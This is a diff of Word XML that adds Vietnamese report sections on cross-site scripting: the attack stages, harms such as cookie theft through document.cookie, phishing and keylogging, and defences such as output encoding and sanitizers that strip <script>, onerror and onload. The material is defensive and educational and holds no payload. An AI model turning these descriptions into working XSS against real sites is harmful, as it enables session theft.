+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
                     <a:ln>
                       <a:solidFill>
                         <a:schemeClr val="tx1"/>
@@ -19324,6 +23575,41 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Nguồn: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId31" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:bCs/>
+            <w:iCs/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>https://viblo.asia/p/ky-thuat-tan-cong-xss-va-cach-ngan-chan-YWOZr0Py5Q0</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="2"/>
@@ -19343,7 +23629,6 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc208343451"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19354,9 +23639,9 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Các dạng tấn công và dặc điểm</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="19"/>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Quy trình </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19367,7 +23652,220 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:t>của cuộc tấn công XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Quy trình của một cuộc tấn công XSS có thể được chia làm 4 giai đoạn chính như sau:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bắt đầu với giai đoạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n 1k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ẻ tấn công tìm và thăm dò các website khả thi và dễ bị tấn công. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Di chuyển đến </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>giai đoạn 2 kẻ tấn công sẽ thực hiện việc chèn mã độc vào các form, URL, hay các trường nhập liệu khác của website</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .Sau đó là g</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>iai đoạn 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>, k</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>hi người dùng truy cập vào website, trình duyệt sẽ tự động chạy mã độc. Cuối cùng giai đoạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n 4 m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ã độc sẽ đánh cắp thông tin người dùng hoặc thực hiện các hành động độc hại khác</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"pQCgNIFy","properties":{"formattedCitation":"[19]","plainCitation":"[19]","noteIndex":0},"citationItems":[{"id":162,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/E54CCR6G"],"itemData":{"id":162,"type":"webpage","abstract":"XSS (Cross-Site Scripting) hay tấn công chéo trang, là lỗ hổng bảo mật trong các ứng dụng web, kẻ tấn cống có thể chèn mã độc (thường là JavaScript) vào các trang web này","container-title":"viettelidc.com.vn","language":"vi_VN","title":"XSS là gì? Cách kiểm tra và ngăn chặn tấn công hiệu quả","title-short":"XSS là gì?","URL":"https://viettelidc.com.vn/tin-tuc/xss-la-gi-cach-kiem-tra-va-ngan-chan","author":[{"family":"IDC","given":"Viettel"}],"accessed":{"date-parts":[["2025",10,5]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[19]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:bookmarkStart w:id="18" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="18"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19391,7 +23889,6 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc208343452"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19402,10 +23899,244 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Hậu quả</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="20"/>
-      <w:r>
+        <w:t xml:space="preserve"> Tác hại của cuộc tấn công XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Khi một cuộc tấn công XSS thành công, kẻ tấn công có thể thực hiện nhiều hành vi độc hại nghiêm trọng:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Đầu tiên là hành vi đ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ánh cắp Cookie (Session Hijacking</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>). Kẻ tấn công l</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ấy cắp cookie phiên (document.cookie) của nạn nhân, cho phép kẻ tấn công chiếm quyền điều khiển phiên và truy cập vào tài khoản của người dùng mà không cần mật khẩu.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tiếp theo kẻ tấn công có thể giả mạo và chuyển hướng. Bằng cách c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>huyển hướng người dùng đến các trang web giả mạo (phishing) để lừa họ nhập thông tin đăng nhập hoặc thông tin cá nhân.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ngoài ra kẻ keylogging là hành vi kẻ tấn công có thể thực hiện thông qua việc đính </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>kèm các kịch bản theo dõi thao tác gõ phím của người dùng để đánh cắp mật khẩu, số thẻ tín dụng hoặc các dữ liệu nhạy cảm khác.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hơn nữa, kẻ tấn công còn có thể thực thi các hành vi độc hại khác như việc buộc </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>người dùng thực hiện các hành động trong phạm vi quyền hạn của họ mà họ không hề biết (ví dụ: thay đổi mật khẩu, gửi tin nhắn, hoặc giao dịch tiền).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Hành vi không kém nguy hiểm khác là việc c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>hèn các mã độc hại vào trang để cài đặt phần mềm độc hại (malware) hoặc ransomware lên máy tính của người dùng.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -19415,7 +24146,523 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Biện pháp phòng chống và bảo vệ chủ yếu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Để phòng chống XSS, các nhà phát triển cần tuân thủ nguyên tắc "Không bao giờ tin tưởng dữ liệu đầu vào của người dùng" và áp dụng các biện pháp bảo mật chặt chẽ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> như :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Mã hóa đ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ầ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>u ra (Output Encoding) vì đ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ây là biện pháp phòng thủ hiệu quả nhất. Khi hiển thị dữ liệu từ người dùng lên trang web, cần mã hóa các ký tự đặc biệt (&lt;, &gt;, ", ') thành các thực thể HTML tương ứng (ví dụ:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt; thành &amp;lt; và &gt; thành &amp;gt;).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Điều này buộc trình duyệt coi các ký tự đó là văn bản thuần túy, chứ không phải là mã HTML/JavaScript cần thự</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>c thi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Bên cạnh đó </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>xác thực và lọc dữ liệu đầu vào (i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>nput validation &amp; sanitization) cũng là một biện pháp được khuyến nghị. Qua đó t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ất cả dữ liệu đầu vào từ người dùng cần được kiểm tra nghiêm ngặt để đảm bảo nó khớp với định dạng mong đợi (ví dụ: trường tên chỉ chấp nhận chữ cái và khoảng trắ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ng). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Sử dụng các thư viện lọc (Sanitizer) chuyên dụng để loại bỏ các thẻ HTML/JavaScript nguy hiểm (&lt;script&gt;, onerror, onload, v.v.) khỏi đầu vào của ngườ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>i dùng</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
